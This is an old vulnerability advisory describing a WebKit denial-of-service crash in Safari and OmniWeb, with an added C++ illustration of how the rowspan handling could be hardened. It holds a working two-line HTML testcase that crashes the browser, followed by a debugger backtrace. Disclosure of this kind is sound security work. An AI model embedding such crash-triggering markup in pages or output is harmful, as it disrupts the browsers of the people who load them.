Apple OS X WebKit WebCore::ArrayImpl "ROWSPAN" DoS
Release Date:
January 14th, 2007
Severity:
Low
Vendor:
Apple
Versions Affected:
Apple OS X 10.4.8
Safari 2.0.4 (419.3)
WebKit build 18794
OmniWeb 5.5.3
Overview:
A denial of service (null pointer dereference) vulnerability exists within WebKit which allows an attacker to post a specially crafted .html page that causes the application to crash. This is basically a follow-up to another flaw, reported by Yannick von Arx, that was fixed in the latest build of WebKit but was not fixed in Safari.
Technical Details:
Below is a testcase to reproduce this issue:
<TABLE>
<TD ROWSPAN=40000001>
Below is the crash triggered on OSX 10.4.8 against OmniWeb 5.5.3:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x3456fbee in WebCore::ArrayImpl::ArrayImpl ()
(gdb) bt
#0 0x3456fbee in WebCore::ArrayImpl::ArrayImpl ()
#1 0x34636a28 in WebCore::RenderTableSection::ensureRows ()
#2 0x34637417 in WebCore::RenderTableSection::addCell ()
#3 0x34638b20 in WebCore::RenderTableRow::addChild ()
#4 0x3456042b in WebCore::NodeImpl::createRendererIfNeeded ()
#5 0x3448a1a0 in WebCore::ElementImpl::attach ()
#6 0x3447ec73 in WebCore::HTMLParser::insertNode ()
#7 0x3447f210 in WebCore::HTMLParser::handleError ()
#8 0x3447ec4c in WebCore::HTMLParser::insertNode ()
#9 0x3447f210 in WebCore::HTMLParser::handleError ()
#10 0x3447ec4c in WebCore::HTMLParser::insertNode ()
#11 0x34481402 in WebCore::HTMLParser::parseToken ()
#12 0x34482732 in WebCore::HTMLTokenizer::processToken ()
#13 0x344867de in WebCore::HTMLTokenizer::parseTag ()
#14 0x344884fb in WebCore::HTMLTokenizer::write ()
#15 0x34533ae0 in WebCore::Frame::write ()
== snip ==
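The backtrace shows the cell's ROWSPAN flowing from addCell into ensureRows, where the row array is grown and a failed allocation ends as a write through address 0. The following is an added illustration, not WebKit code, of the two checks a hardened version of that path needs: a clamped, saturating parse of the attribute and a row-growth routine that refuses absurd sizes and reports allocation failure. The limits kMaxRowSpan and kMaxRows are assumptions; the bounds WebKit actually adopted are not given here.

```cpp
#include <cstdint>
#include <new>
#include <string>
#include <vector>

// Assumed limits; the bounds WebKit actually adopted are not on this page.
constexpr uint32_t kMaxRowSpan = 8190;
constexpr uint64_t kMaxRows = 1ULL << 20;
struct TableSection { std::vector<std::vector<int>> rows; };

// Parse a rowspan attribute: digits only, saturating, clamped to
// kMaxRowSpan, defaulting to 1 for junk or zero. "40000001" clamps.
uint32_t parseRowSpan(const std::string& attr) {
    uint64_t value = 0;
    bool sawDigit = false;
    for (char c : attr) {
        if (c < '0' || c > '9') break;
        sawDigit = true;
        value = value * 10 + static_cast<uint64_t>(c - '0');
        if (value > kMaxRowSpan) return kMaxRowSpan;
    }
    return (sawDigit && value > 0) ? static_cast<uint32_t>(value) : 1;
}

// Grow the section to `needed` rows. The crash above came from growing
// the row array without checking the result; here an absurd request is
// refused and an allocation failure is reported instead of dereferenced.
bool ensureRows(TableSection& s, uint64_t needed) {
    if (needed <= s.rows.size()) return true;
    if (needed > kMaxRows) return false;
    try { s.rows.resize(static_cast<size_t>(needed)); }
    catch (const std::bad_alloc&) { return false; }
    return true;
}

// Place a cell at rowIndex spanning the rows its attribute asks for;
// the 64-bit sum cannot overflow for 32-bit inputs.
bool addCell(TableSection& s, uint32_t rowIndex, const std::string& rowSpanAttr) {
    uint64_t needed = static_cast<uint64_t>(rowIndex) + parseRowSpan(rowSpanAttr);
    if (!ensureRows(s, needed)) return false;
    for (uint64_t r = rowIndex; r < needed; ++r) s.rows[r].push_back(1);
    return true;
}

// Rows present after one addCell into an empty section, or 0 if rejected;
// canGrowTo reports whether an empty section may be grown straight to n rows.
size_t rowsAfterCell(uint32_t rowIndex, const char* attr) {
    TableSection s;
    return addCell(s, rowIndex, attr) ? s.rows.size() : 0;
}
bool canGrowTo(uint64_t n) { TableSection s; return ensureRows(s, n); }
```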
Solution:
Get Firefox!
Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com
Related Links:
http://security-protocols.com/poc/sp-x41.html
http://security-protocols.com/sp-x41-advisory.php
http://nightly.webkit.org
http://developer.apple.com/opensource/internet/webkit.html
http://omnigroup.com/applications/omniweb/
2007 Security-Protocols LLC